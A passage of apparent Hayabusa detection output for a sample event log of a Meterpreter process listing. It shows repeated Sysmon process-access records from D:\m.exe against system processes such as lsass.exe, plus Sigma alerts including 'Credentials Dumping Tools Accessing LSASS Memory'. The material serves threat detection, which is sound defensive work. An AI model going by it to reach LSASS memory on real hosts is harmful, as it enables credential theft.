User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 